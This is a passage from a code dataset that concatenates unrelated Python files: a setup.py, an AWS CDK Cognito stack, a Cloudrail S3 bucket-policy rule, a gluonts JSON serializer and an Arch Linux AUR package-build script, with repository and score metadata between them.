metadata[key] = (revidxs[ind1:ind2], jac_type, factor)
else:
# apply the reverse index to each part of revidxs so that
# we can avoid copying the index array during updates.
metadata[key] = (revidxs[ind1:ind2][np.argsort(idxs)],
jac_type, factor)
# data array for the CSR will be the same as for the COO since
# it was already in sorted order.
coo = coo_matrix((data, (rows, cols)), shape=(num_rows, num_cols))
coo_data_size = coo.data.size
self._matrix = coo.tocsr()
# make sure data size is the same between coo and csr, else indexing is
# messed up
if coo_data_size != self._matrix.data.size:
raise ValueError("CSR matrix data contains duplicate row/col entries. "
"This would break internal indexing.")
| 2.828125 | 3 |
setup.py | medchemfi/sdfconf | 6 | 11017 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import re
import os
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
with open("src/sdfconf/_version.py", "rt") as vf:
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
for line in vf:
mo = re.search(VSRE, line, re.M)
if mo:
verstr = mo.group(1)
break
if not mo:
raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))
setup(name = 'sdfconf',
version = verstr,
description = ("Diverse manipulation and analysis tool for .sdf files."),
long_description = read('README.rst'),
install_requires = ['numpy>=1.7.1','matplotlib>=1.4.2'],
author = '<NAME>',
author_email = '<EMAIL>',
maintainer = '<NAME>',
maintainer_email = '<EMAIL>',
packages = ['sdfconf'],
package_dir = {'sdfconf':'src/sdfconf'},
keywords = 'sdf mol2 conformation analyze histogram',
url = 'http://users.jyu.fi/~pentikai/',
license = 'MIT/expat',
entry_points =
{'console_scripts': ['sdfconf = sdfconf.runner:main'],
'setuptools.installation': ['eggsecutable = sdfconf.runner:main',],
},
classifiers= ['Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
#'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Topic :: Scientific/Engineering :: Chemistry' ,
'Topic :: Software Development :: Libraries',
],
##FIXME
#'''
#package_data = {
# 'sample':['sample_data.sdf']
# },
#'''
) | 1.78125 | 2 |
stacks/cognito_stack.py | adamdubey/devops-serverless-app-aws-cdk | 0 | 11018 | from aws_cdk import (
aws_cognito as cognito,
aws_iam as iam,
aws_ssm as ssm,
core
)
class CognitoStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
prj_name = self.node.try_get_context("project_name")
env_name = self.node.try_get_context("env")
user_pool = cognito.CfnUserPool(self, 'cognitouserpool',
auto_verified_attributes = [
'email'
],
username_attributes = [
'email', 'phone_number'
],
user_pool_name = prj_name + '-user-pool',
schema = [
{
'attributeDataType': 'String',
'name': 'param1',
'mutable': True
}
],
policies = cognito.CfnUserPool.PoliciesProperty(
password_policy = cognito.CfnUserPool.PasswordPolicyProperty(
minimum_length = 10,
require_lowercase = True,
require_numbers = True,
require_symbols = False,
require_uppercase = True
)
)
)
user_pool_client = cognito.CfnUserPoolClient(self, 'pool-client',
user_pool_id = user_pool.ref,
client_name = env_name + '-app-client'
)
identity_pool = cognito.CfnIdentityPool(self, 'identity-pool',
allow_unauthenticated_identities = False,
cognito_identity_providers = [
cognito.CfnIdentityPool.CognitoIdentityProviderProperty(
client_id = user_pool_client.ref,
provider_name = user_pool.attr_provider_name
)
],
identity_pool_name = prj_name + '-identity-pool'
)
ssm.StringParameter(self, 'app-id',
parameter_name = '/' + env_name + '/cognito-app-client-id',
string_value = user_pool_client.ref
)
ssm.StringParameter(self, 'user-pool-id',
parameter_name = '/' + env_name + '/cognito-user-pool-id',
string_value = user_pool_client.user_pool_id
)
ssm.StringParameter(self, 'identity-pool-id',
parameter_name = '/' + env_name + '/cognito-identity-pool-id',
string_value = identity_pool.ref
)
| 2.015625 | 2 |
cloudrail/knowledge/rules/aws/context_aware/s3_bucket_policy_vpc_endpoint_rule.py | my-devops-info/cloudrail-knowledge | 0 | 11019 | <reponame>my-devops-info/cloudrail-knowledge
from typing import Dict, List
from cloudrail.knowledge.context.aws.iam.policy import S3Policy
from cloudrail.knowledge.context.aws.iam.policy_statement import StatementEffect
from cloudrail.knowledge.context.aws.s3.s3_bucket import S3Bucket
from cloudrail.knowledge.context.aws.ec2.vpc import Vpc
from cloudrail.knowledge.context.aws.ec2.vpc_endpoint import VpcEndpoint
from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext
from cloudrail.knowledge.rules.aws.aws_base_rule import AwsBaseRule
from cloudrail.knowledge.rules.base_rule import Issue
from cloudrail.knowledge.rules.rule_parameters.base_paramerter import ParameterType
class S3BucketPolicyVpcEndpointRule(AwsBaseRule):
def execute(self, env_context: AwsEnvironmentContext, parameters: Dict[ParameterType, any]) -> List[Issue]:
issues_list: List[Issue] = []
vpc_to_buckets_map: Dict[Vpc, List[S3Bucket]] = self._create_vpc_to_buckets_map(env_context)
for vpc, bucket_list in vpc_to_buckets_map.items():
for s3_vpce in self._filter_by_service_name(vpc):
for bucket in bucket_list:
if bucket.resource_based_policy is None or \
not self._is_restrict_to_s3_vpce(bucket.resource_based_policy, s3_vpce):
issues_list.append(Issue(f"~{bucket.get_type()}~. `{bucket.get_friendly_name()}` is accessible via"
f" VPC endpoint `{s3_vpce.get_friendly_name()}`. "
f"~in VPC~. `{vpc.get_friendly_name()}` "
f"with a policy that is not restricting requests sourced from"
f" a VPC Endpoint.", bucket, bucket))
return issues_list
def get_id(self) -> str:
return "s3_bucket_policy_vpce"
@staticmethod
def _create_vpc_to_buckets_map(env_context: AwsEnvironmentContext) -> Dict[Vpc, List[S3Bucket]]:
region_to_buckets_map: Dict[str, List[S3Bucket]] = {}
vpc_to_buckets_map: Dict[Vpc, List[S3Bucket]] = {}
for bucket in env_context.s3_buckets:
if not bucket.is_public:
if bucket.region not in region_to_buckets_map:
region_to_buckets_map[bucket.region] = []
region_to_buckets_map[bucket.region].append(bucket)
for vpc in env_context.vpcs.values():
if vpc.region in region_to_buckets_map:
vpc_to_buckets_map[vpc] = region_to_buckets_map[vpc.region]
return vpc_to_buckets_map
@staticmethod
def _is_restrict_to_s3_vpce(policy: S3Policy, s3_vpce: VpcEndpoint) -> bool:
for statement in policy.statements:
expected_operator_prefix: str = "String" if statement.effect == StatementEffect.ALLOW else "StringNot"
for condition_block in statement.condition_block:
if condition_block.operator.startswith(expected_operator_prefix) and \
condition_block.key == "aws:SourceVpce" and \
s3_vpce.vpce_id in condition_block.values:
return True
return False
@staticmethod
def _filter_by_service_name(vpc: Vpc, service_name: str = "s3"):
return [s3_vpce for s3_vpce in vpc.endpoints if s3_vpce.service_name.endswith(f".{service_name}")]
def should_run_rule(self, environment_context: AwsEnvironmentContext) -> bool:
return bool(environment_context.s3_buckets)
| 1.921875 | 2 |
src/gluonts/core/serde/_json.py | PascalIversen/gluon-ts | 1 | 11020 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
JSON Serialization/Deserialization
----------------------------------
The canonical way to do this is to define and `default` and `object_hook`
parameters to the json.dumps and json.loads methods. Unfortunately, due
to https://bugs.python.org/issue12657 this is not possible at the moment,
as support for custom NamedTuple serialization is broken.
To circumvent the issue, we pass the input value through custom encode
and decode functions that map nested object terms to JSON-serializable
data structures with explicit recursion.
"""
import json
from typing import Any, Optional
from ._base import encode, decode
def dump_json(o: Any, indent: Optional[int] = None) -> str:
"""
Serializes an object to a JSON string.
Parameters
----------
o
The object to serialize.
indent
An optional number of spaced to use as an indent.
Returns
-------
str
A string representing the object in JSON format.
See Also
--------
load_json
Inverse function.
"""
return json.dumps(encode(o), indent=indent, sort_keys=True)
def load_json(s: str) -> Any:
"""
Deserializes an object from a JSON string.
Parameters
----------
s
A string representing the object in JSON format.
Returns
-------
Any
The deserialized object.
See Also
--------
dump_json
Inverse function.
"""
return decode(json.loads(s))
| 3.40625 | 3 |
run.py | Aisbergg/docker-image-arch-aur-makepkg | 7 | 11021 | <gh_stars>1-10
#!/usr/bin/python3
import argparse
import os
import sys
import re
import shutil
import tempfile
import pwd
import grp
import tarfile
import time
import glob
import urllib.request
from subprocess import Popen, PIPE
import aur
import pacman
local_source_dir = '/makepkg/local_src'
build_dir = os.path.abspath('/makepkg/build')
pacman_cache_dir = '/var/cache/pacman/pkg'
accepted_architectures = ['any', 'x86_64', 'i686']
packages_in_cache = None
packages_in_offical_repositories = None
class ConsoleColors:
blue = '\033[94m'
green = '\033[92m'
red = '\033[91m'
yellow = '\033[93m'
reset = '\033[0m'
class InvalidPackageSourceError(Exception):
"""Invalid package source exception.
Args:
message (str): Message passed with the exception
"""
def __init__(self, message):
super().__init__(message)
class NoSuchPackageError(Exception):
"""No such package exception.
Args:
message (str): Message passed with the exception
"""
def __init__(self, message):
super().__init__(message)
def printInfo(message):
"""Print a colorful info message.
Args:
message (str): Message to be printed
"""
print(ConsoleColors.blue + message + ConsoleColors.reset)
def printSuccessfull(message):
"""Print a colorful successfull message.
Args:
message (str): Message to be printed
"""
print(ConsoleColors.green + message + ConsoleColors.reset)
def printWarning(message):
"""Print a colorful warning message.
Args:
message (str): Message to be printed
"""
print(ConsoleColors.yellow + message + ConsoleColors.reset)
def printError(message):
"""Print a colorful error message.
Args:
message (str): Message to be printed
"""
print(ConsoleColors.red + message + ConsoleColors.reset)
class PackageRepository:
"""Represents an enum of all package repositories."""
CORE = "core"
EXTRA = "extra"
COMMUNITY = "community"
MULTILIB = "multilib"
AUR = "aur"
LOCAL = "local"
class PackageBase:
"""Base class for pacman packages and their sources.
Args:
name (str): Name of the Arch Linux package
"""
name = None
version = None
architecture = None
repository = None
dependencies = []
license = None
# is a cached version of this package available
# 0: not available
# 1: different version(s) available
# 2: same version available
cache_available = 0
# True if this package needs to be installed before a dependent package can
# be build
is_make_dependency = False
# status of the installtion
# -2: dependency failed to install
# -1: failed to install
# 0: is not installed
# 1: is installed
# 2: different version is installed
# 3: successfully installed
installation_status = 0
# store for errors
error_info = None
def __init__(self, name):
self.name = name
def _check_if_cache_is_available(self):
# check if same version is available
name = '{0}-{1}-{2}.pkg.tar.xz'.format(
self.name, self.version, self.architecture)
if name in packages_in_cache:
self.cache_available = 2
return
# check if different version is available
else:
regex_different = re.compile(r'{0}-(\S+)-{1}.pkg.tar.xz'.format(
self.name, self.architecture))
for cache_file in packages_in_cache:
match = regex_different.search(os.path.basename(cache_file))
if match:
self.cache_available = 1
return
self.cache_available = 0
def get_installation_status(self):
"""Get the installation status of the package."""
if pacman.is_installed(self.name):
pcm_info = pacman.get_info(self.name)
if pcm_info['Version'] == self.version:
self.installation_status = 1
else:
self.installation_status = 2
else:
self.installation_status = 0
class PacmanPackage(PackageBase):
"""Represents a pacman package from a official repository.
Args:
name (str): Name of the pacman package
"""
def __init__(self, name):
super().__init__(name)
try:
self._get_package_info()
self._check_if_cache_is_available()
self.get_installation_status()
except Exception as e:
self.error_info = e
def _get_package_info(self):
"""Get the needed package information."""
is_available = False
for pcm_info in packages_in_offical_repositories:
if pcm_info['id'] == self.name:
is_available = True
break
if is_available:
pkg_info = pacman.get_info(self.name)
self.version = pkg_info['Version']
self.architecture = pkg_info['Architecture']
if 'Repository' in pkg_info:
if pkg_info['Repository'] == PackageRepository.EXTRA:
self.repository = PackageRepository.EXTRA
elif pkg_info['Repository'] == PackageRepository.CORE:
self.repository = PackageRepository.CORE
elif pkg_info['Repository'] == PackageRepository.COMMUNITY:
self.repository = PackageRepository.COMMUNITY
elif pkg_info['Repository'] == PackageRepository.MULTILIB:
self.repository = PackageRepository.MULTILIB
else:
self.repository = PackageRepository.EXTRA
self.dependencies = pkg_info['Depends On'].split(' ')
self.license = pkg_info['Licenses']
else:
raise NoSuchPackageError(
"No package with the name '{0}' exists in the official repositories".format(self.name))
def install(self):
"""Install the Pacman package."""
if not (self.installation_status == 1 or self.installation_status == 3):
printInfo("Installing package {0} {1}...".format(
self.name, self.version))
rc, out, err = run_command(['pacman', '-S', '--force', '--needed',
'--noconfirm', '--noprogressbar',
'--ignore', 'package-query', '--ignore',
'pacman-mirrorlist', '--cachedir',
pacman_cache_dir, self.name])
if rc != 0:
self.installation_status = -1
self.error_info = Exception(
"Failed to install package {0}: {1}".format(self.name, '\n'.join(err)))
else:
self.installation_status = 3
class PackageSource(PackageBase):
"""Represents a source of a package.
Args:
name (str): Name of the package
remove_dowloaded_source (bool): If True remove the source downloaded by 'makepkg' before build. If False
the sources will be kept, under the condition that the source is of the same
version of the package to be build
local_source_path (str): Local path of the source. If 'None' the pckage will be fetched from the AUR
"""
# path that contains the package source
path = None
# the dependencies that need to be installed prior build
make_dependencies = []
# is marked as an explicit build, so it is not a dependency of another
# package
explicit_build = False
# the status of the build
# 0: not yet build
# 1: successfully build
# 2: skipped build
# 3: failed to build
# 4: make dependency failed
build_status = 0
# If True remove the source downloaded by 'makepkg' before build. If False
# the sources will be kept, under the condition that the source is of the same
# version of the package to be build
remove_dowloaded_source = False
# package source is build from git repository
build_from_git = False
# package source is build from git repository
split_package_names = None
def __init__(self, name, remove_dowloaded_source, local_source_path=None):
super().__init__(name)
self.remove_dowloaded_source = remove_dowloaded_source
try:
# is local source package
if local_source_path:
self.repository = PackageRepository.LOCAL
self.path = os.path.abspath(local_source_path)
# is AUR package
else:
self.repository = PackageRepository.AUR
self._download_aur_package_source()
self._parse_pkgbuild_file()
self._check_if_cache_is_available()
self.get_installation_status()
except Exception as e:
self.error_info = e
def _parse_from_string(self, name, string):
"""Parse a bash variable value from a string.
Args:
name (str): Name of the variable to be parsed
string (str): String containing the bash variables
Returns:
str. Value for given params
list. Value for given params
None. If given param wasn't found
"""
# search for array like value
match = re.compile(r'{0}=\(([^\)]*)\)'.format(name),
re.DOTALL).search(string)
if match:
m = match.group(1).replace('\n', '').replace('"', '').replace('\'', '')
return [x.strip('\"\'') for x in re.compile(r'\s').split(m) if x != '']
else:
# search for simple string value
match = re.compile(r'{0}=(.+)'.format(name)).search(string)
if match:
return match.group(1).strip('\"\' ')
return None
def _get_dependencies_from_alias(self, dep_alias_names):
"""Get the real package names if only an alias was supplied.
Args:
dep_alias_names (list): (Alias-)Names of the packages
Returns:
list. Real names of the packages
"""
dependencies = []
if dep_alias_names:
for dep_alias_name in dep_alias_names:
dep_alias_name = re.sub(r'(.+?)(<|<=|>|>=){1}.*?$', r'\1',
dep_alias_name)
rc, out, err = run_command(['package-query', '-QSiif', '%n', dep_alias_name], print_output=False)
if rc == 0:
dependencies.append(out[-1])
else:
dependencies.append(dep_alias_name)
return dependencies
def _parse_pkgbuild_file(self):
"""Parse package information from PKGBUILD file."""
pkgbuild_file = os.path.join(self.path, "PKGBUILD")
with open(pkgbuild_file, 'r') as f:
file_content = f.read()
# package name
pkgbase = self._parse_from_string('pkgbase', file_content)
if pkgbase:
self.name = pkgbase
split_package_names = self._parse_from_string('pkgname', file_content)
self.split_package_names = []
for spn in split_package_names:
self.split_package_names.append(
re.sub(r'\$\{{0,1}[A-Za-z_][A-Za-z0-9_]*\}{0,1}',
pkgbase, spn, flags=re.IGNORECASE))
else:
self.name = self._parse_from_string('pkgname', file_content)
self.build_from_git = self.name.endswith('-git')
# package version (combined with release)
version = self._parse_from_string('pkgver', file_content)
release = self._parse_from_string('pkgrel', file_content)
self.version = version + '-' + release
# package architecture
architectures = self._parse_from_string('arch', file_content)
for ac_arch in accepted_architectures:
if ac_arch in architectures:
self.architecture = ac_arch
break
if not self.architecture:
raise InvalidPackageSourceError(
"Architecture of the package '{0}' is not supported".format(os.path.basename(self.path)))
# package license
self.license = self._parse_from_string('license', file_content)
if type(self.license) == list:
self.license = self.license[0]
# raise an error if PKGBUILD file does not contain mandatory variables
if not self.name or \
not version or \
not release or \
not self.architecture or \
not self.license:
raise InvalidPackageSourceError(
"One or more mandatory variables (name, version, release, architecture, license) in the package '{0}' is missing".format(os.path.basename(self.path)))
# package dependencies
self.dependencies = self._get_dependencies_from_alias(
self._parse_from_string('depends', file_content))
# package make dependencies
self.make_dependencies = self._get_dependencies_from_alias(
self._parse_from_string('makedepends', file_content))
# package repository
self.repository = PackageRepository.LOCAL
def _copy_source_to_build_dir(self):
"""Copy the package source to the build dir."""
pkg_build_dir = os.path.join(build_dir, self.name)
if os.path.exists(pkg_build_dir) and \
os.path.isdir(pkg_build_dir) and \
(not self.remove_dowloaded_source or not self.build_from_git):
old_pkgbuild_file = os.path.join(pkg_build_dir,
'PKGBUILD')
if os.path.exists(old_pkgbuild_file) and \
os.path.isfile(old_pkgbuild_file):
try:
old_pkg_source = PackageSource(
self.name, False, pkg_build_dir)
if old_pkg_source.version == self.version:
if self.repository == PackageRepository.AUR:
shutil.rmtree(self.path, ignore_errors=True)
self.path = pkg_build_dir
return
except:
pass
shutil.rmtree(pkg_build_dir, ignore_errors=True)
shutil.copytree(self.path, pkg_build_dir)
if self.repository == PackageRepository.AUR:
shutil.rmtree(self.path, ignore_errors=True)
self.path = pkg_build_dir
def _download_aur_package_source(self):
"""Fetch package source from the AUR."""
aur_pkg_download_path = tempfile.mkdtemp()
try:
i = aur.info(self.name)
except:
raise NoSuchPackageError(
"No package with the name '{0}' exists in the AUR".format(self.name))
pkg_tar_file_path = os.path.join(aur_pkg_download_path,
i.name + ".tar.gz")
# download package sources from AUR
urllib.request.urlretrieve("https://aur.archlinux.org" +
i.url_path,
pkg_tar_file_path)
# extract source tarball
tar = tarfile.open(pkg_tar_file_path)
tar.extractall(path=aur_pkg_download_path)
tar.close()
os.remove(pkg_tar_file_path)
self.path = os.path.join(aur_pkg_download_path, os.listdir(aur_pkg_download_path)[0])
def makepkg(self, uid, gid):
"""Run makepkg.
Args:
uid (int): UID of the build user
gid (int): GID of the build user
Returns:
bool. True if build was successfull, False if not
"""
self._copy_source_to_build_dir()
# set uid and gid of the build dir
os.chown(self.path, uid, gid)
for root, dirs, files in os.walk(self.path):
for f in dirs + files:
if os.path.isfile(f) or os.path.isdir(f):
os.chown(os.path.join(root, f), uid, gid)
printInfo("Building package {0} {1}...".format(
self.name, self.version))
os.chdir(self.path)
rc, out, err = run_command(['makepkg', '--force', '--nodeps', '--noconfirm'], uid)
if rc != 0:
self.error_info = Exception("Failed to build package '{0}': {1}".format(
self.name, '\n'.join(err)))
return False
# get new version info when build from git
if self.build_from_git:
git_pkg = PackageSource(
self.name, False, self.path)
self.version = git_pkg.version
for pkg_file in glob.glob(os.path.join(self.path, '*.pkg.tar.xz')):
pkg_dest = os.path.join(pacman_cache_dir, os.path.basename(pkg_file))
# move created package to Pacman package cache
shutil.move(pkg_file, pkg_dest)
# set uid and gid of the build package
os.chown(pkg_dest, 0, 0)
if self.is_make_dependency:
self.install()
return True
def get_package_file_name(self):
"""Get the pacman package file name.
Returns:
str. The name of the package
"""
return '{0}-{1}-{2}.pkg.tar.xz'.format(
self.name, self.version, self.architecture)
def get_all_dependencies(self):
"""Get dependencies and make dependencies together.
Returns:
list. Names of all dependencies
"""
return self.dependencies + self.make_dependencies
def install(self):
"""Install the build package."""
if not (self.installation_status == 1 or self.installation_status == 3)\
and (self.build_status == 1 or self.build_status == 2):
pkg_names = [self.name]
# different names if package is a splitted package
if self.split_package_names:
pkg_names = self.split_package_names
for pkg_name in pkg_names:
printInfo("Installing package {0} {1}...".format(
pkg_name, self.version))
rc, out, err = run_command(
['pacman', '-U', '--noconfirm', '--force', '--ignore',
'package-query', '--ignore', 'pacman-mirrorlist',
'--cachedir', pacman_cache_dir, os.path.join(
pacman_cache_dir, '{0}-{1}-{2}.pkg.tar.xz'.format(
pkg_name, self.version, self.architecture))])
if rc != 0:
self.installation_status = -1
self.error_info = Exception(
"Failed to install package '{0}': {1}".format(pkg_name, '\n'.join(err)))
return False
self.installation_status = 3
def change_user(uid):
"""Temporarily change the UID and GID for code execution."""
def set_uid_and_guid():
os.setuid(uid)
return set_uid_and_guid
def run_command(command, uid=None, print_output=True):
"""Run a command in a subprocess.
Args:
command (string): Command to run
uid (int): UID of the user to run with
print_output (bool): True if the output should be printed to stdout and stderr
Returns:
(int, list, list). Return code of the subprocess, sdtout and stderr
"""
if uid:
process = Popen(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, preexec_fn=change_user(uid))
else:
process = Popen(command, stdout=PIPE, stderr=PIPE, universal_newlines=True)
if print_output:
err = []
out = []
while True:
tmp = process.stdout.readline()
if tmp:
tmp = tmp.rstrip('\n ')
if tmp != '':
out.append(tmp)
print(tmp)
if process.poll() is not None:
break
time.sleep(.05)
for line in process.stdout.readlines():
tmp = line.rstrip('\n ')
out.append(tmp)
print(tmp)
rc = process.poll()
if rc != 0:
for line in process.stderr.readlines():
tmp = line.rstrip('\n ')
printError(tmp)
err.append(tmp)
return (rc, out, err)
else:
out, err = process.communicate()
rc = process.returncode
return (rc, out.splitlines(), err.splitlines())
def get_package_recursive(pkg_name,
explicit_build,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
is_make_dependency):
"""Get a package and all their dependencies.
Args:
pkg_name (str): Name of the package
explicit_build (bool): True if package source is given by the user
pkg_dict (dict): Store for package information
locally_available_package_sources (list): List of all locally available package sources
remove_dowloaded_source (bool): If True remove the source downloaded by 'makepkg' before build. If False
the sources will be kept, under the condition that the source is of the same
version of the package to be build
is_make_dependency (bool): True if package shall be installed as a make dependency
"""
# check if package is already in pkg_dict
if pkg_name in pkg_dict:
return
# check if package is in official repo
for pcm_info in packages_in_offical_repositories:
if pcm_info['id'] == pkg_name:
pcm_pkg = PacmanPackage(pkg_name)
pcm_pkg.is_make_dependency = is_make_dependency
pkg_dict[pkg_name] = pcm_pkg
return
# check if package source is locally available
if pkg_name in locally_available_package_sources:
pkg_path = os.path.join(local_source_dir, pkg_name)
lcl_pkg = PackageSource(pkg_name, remove_dowloaded_source, pkg_path)
if lcl_pkg.name in pkg_dict:
return
lcl_pkg.explicit_build = explicit_build
lcl_pkg.explicit_build = is_make_dependency
pkg_dict[pkg_name] = lcl_pkg
# if split package the name can defer
pkg_dict[lcl_pkg.name] = lcl_pkg
if not lcl_pkg.error_info:
for dependency in lcl_pkg.dependencies:
get_package_recursive(dependency,
False,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
True if is_make_dependency else False)
for make_dependency in lcl_pkg.make_dependencies:
get_package_recursive(make_dependency,
False,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
True)
# check for the package in the AUR
else:
aur_pkg = PackageSource(pkg_name, remove_dowloaded_source, None)
if aur_pkg.name in pkg_dict:
return
aur_pkg.explicit_build = explicit_build
pkg_dict[pkg_name] = aur_pkg
# if split package the name can defer
pkg_dict[aur_pkg.name] = aur_pkg
if not aur_pkg.error_info:
for dependency in aur_pkg.dependencies:
get_package_recursive(dependency,
False,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
True if is_make_dependency else False)
for make_dependency in aur_pkg.make_dependencies:
get_package_recursive(make_dependency,
False,
pkg_dict,
locally_available_package_sources,
remove_dowloaded_source,
True)
def build_package_recursive(pkg_name,
pkg_dict,
rebuild,
install_all_dependencies,
uid,
gid):
"""Build a package and all their dependencies.
Args:
pkg_name (str): Name of the package
pkg_dict (dict): Store for package information
rebuild (int): Rebuild behaviour:
0: Build only new versions of packages (default)
1: Rebuild all explicit listed packages
2: Rebuild all explicit listed packages and their dependencies
uid (int): UID of the build user
gid (int): GID of the build user
"""
pkg = pkg_dict[pkg_name]
# break if a error occurred
if pkg.error_info:
return
# break if the package has already been processed
if type(pkg) is PackageSource and pkg.build_status != 0:
return
if type(pkg) is PacmanPackage:
# break if the package has already been processed
if pkg.installation_status < 0 or pkg.installation_status == 3:
return
# install pacman package if it is a make dependency
if (pkg.is_make_dependency or install_all_dependencies):
pkg.install()
return
dependency_changed = False
for dependency in pkg.get_all_dependencies():
pkg_dependency = pkg_dict[dependency]
build_package_recursive(dependency, pkg_dict, rebuild, install_all_dependencies, uid, gid)
if pkg_dependency.error_info:
pkg.build_status = 4
return
else:
if type(pkg_dependency) is PackageSource and \
pkg_dependency.build_status == 1:
dependency_changed = True
pkg.get_installation_status()
if dependency_changed:
if pkg.makepkg(uid, gid):
pkg.build_status = 1
else:
pkg.build_status = 3
else:
# rebuild only if new version is available
if rebuild == 0:
if pkg.cache_available < 2:
if pkg.makepkg(uid, gid):
pkg.build_status = 1
else:
pkg.build_status = 3
else:
pkg.build_status = 2
# rebuild if explicit or a new version is available
elif rebuild == 1:
if pkg.cache_available < 2 or pkg.explicit_build:
if pkg.makepkg(uid, gid):
pkg.build_status = 1
else:
pkg.build_status = 3
else:
pkg.build_status = 2
# rebuild all
elif rebuild == 2:
if pkg.makepkg(uid, gid):
pkg.build_status = 1
else:
pkg.build_status = 3
if install_all_dependencies:
pkg.install()
return
def format_log(pkg, msg, prefix=''):
"""Format a build log for a given packge.
Args:
pkg (PackageBase): The package
msg (str): Message for the package
prefix (str): Prefix added for message in multiple lines
Returns:
str. The formatted build log
"""
msg_lines = msg.splitlines()
if len(msg_lines) > 1:
for i in range(1, len(msg_lines)):
msg_lines[i] = prefix + ' ' + msg_lines[i]
msg = '\n'.join(msg_lines)
if pkg.version:
return "{0} {1}: {2}".format(pkg.name, pkg.version, msg)
return "{0}: {1}".format(pkg.name, msg)
def print_build_log_recursive(pkg_names, pkg_dict, prefix='', is_root=False):
"""Recursivly prints a build log for a given package.
Args:
pkg_names (PackageBase): The package
pkg_dict (dict): Store for package information
prefix (str): Prefix for the message
is_root (bool): True if first recursion
Returns:
(bool, list). Tuple consting of the build status and the log messages as a list
"""
success = True
log = []
log_prefix = prefix + '├── '
intermediate_prefix = prefix + '| '
for pos, anchor, pkg_name in enumerate_package_names(pkg_names):
pkg = pkg_dict[pkg_name]
log_dep = []
if is_root:
log_prefix = ""
intermediate_prefix = ""
elif anchor == 1:
log_prefix = prefix + '└── '
intermediate_prefix = prefix + ' '
if type(pkg) == PacmanPackage:
if pkg.installation_status < 0:
success = False
log.append(log_prefix + format_log(
pkg, "Failed to install: " + str(pkg.error_info), intermediate_prefix))
elif pkg.installation_status == 0:
log.append(log_prefix + format_log(pkg, "Not installed"))
elif pkg.installation_status == 1:
log.append(log_prefix + format_log(pkg, "Skipped install"))
elif pkg.installation_status == 3:
log.append(log_prefix + format_log(pkg, "Successfully installed"))
else:
deps = pkg.get_all_dependencies()
if len(deps) > 0:
success, log_dep = print_build_log_recursive(
deps,
pkg_dict,
intermediate_prefix)
if not success:
log.append(log_prefix + format_log(
pkg, "Dependency Failed: " + str(pkg.error_info), intermediate_prefix))
elif pkg.error_info:
success = False
log.append(log_prefix + format_log(
pkg, "Failed: " + str(pkg.error_info), intermediate_prefix))
else:
if pkg.build_status == 1:
log.append(log_prefix + format_log(
pkg, "Successfully build"))
elif pkg.build_status == 2:
log.append(log_prefix + format_log(
pkg, "Skipped"))
elif pkg.build_status == 3:
log.append(log_prefix + format_log(pkg, "Failed"))
success = False
elif pkg.build_status == 4:
log.append(log_prefix + format_log(pkg, "Dependency Failed"))
success = False
log = log + log_dep
return success, log
def print_build_log(pkg_name, pkg_dict):
"""Print a build log for a given package.
Args:
pkg_names (PackageBase): The package
pkg_dict (dict): Store for package information
"""
success, log = print_build_log_recursive(
[pkg_name], pkg_dict, '', True)
for line in log:
if success:
printSuccessfull(line)
else:
printError(line)
def enumerate_package_names(sequence):
length = len(sequence)
for count, value in enumerate(sequence):
yield count, length - count, value
def main(argv):
"""Run the main logic.
Args:
argv (list): Command line arguments
"""
parser = argparse.ArgumentParser(
prog='aur-makepkg',
description='Build Pacman packages with makepkg from local source or the AUR',
epilog=''
)
parser.add_argument('-g', '--gid', dest='gid', type=int, default=1000,
help="GID of the build user")
parser.add_argument('-i', '--install-all-dependencies', action='store_true',
dest='install_all_dependencies', default=False,
help="Install all dependencies, not only 'make dependencies'")
parser.add_argument('-k', '--keyrings', dest='keyrings', default=None,
help="Pacman keyrings initialized prior building (comma seperated list)")
parser.add_argument('-p', '--pacman-update', action='store_true',
dest='pacman_update', default=False,
help="Update all installed pacman packages before build")
parser.add_argument('-r', '--rebuild', dest='rebuild', type=int, default=0,
help="""Rebuild behaviour:
0: Build only new versions of packages (default)
1: Rebuild all explicit listed packages
2: Rebuild all explicit listed packages and their dependencies""")
parser.add_argument('--remove-downloaded-source',
dest='remove_dowloaded_source',
action='store_true', default=False,
help="""Remove the source downloaded by 'makepkg' before build. If not
the sources will be kept, under the condition that the source is of the same
version of the package to be build. (Note: Sources of packages build from a Git repository
will always be removed.)""")
parser.add_argument('-u', '--uid', dest='uid', type=int, default=1000,
help="UID of the build user")
parser.add_argument('build_package_names', nargs='+',
help="Name fo packages to be build from local source or the AUR")
args = parser.parse_args(argv)
# create build user and group
try:
grp.getgrgid(args.gid)
except Exception:
os.system("groupadd -g {0} build-user".format(args.gid))
try:
pwd.getpwuid(args.uid)
except Exception:
os.system(
"useradd -p /makepkg/build -m -g {1} -s /bin/bash -u {0} build-user".format(args.uid, args.gid))
# refresh pacman package database
if args.keyrings:
printInfo("Initializing pacman keyring...")
run_command(['pacman-key', '--init'], print_output=False)
rc, out, err = run_command(['pacman-key', '--populate'] + args.keyrings.split(','), print_output=True)
if rc != 0:
raise Exception("Failed to initialize Pacman keyrings: " + '\n'.join(err))
# refresh pacman package database
printInfo("Update pacman package database...")
pacman.refresh()
global packages_in_cache, packages_in_offical_repositories
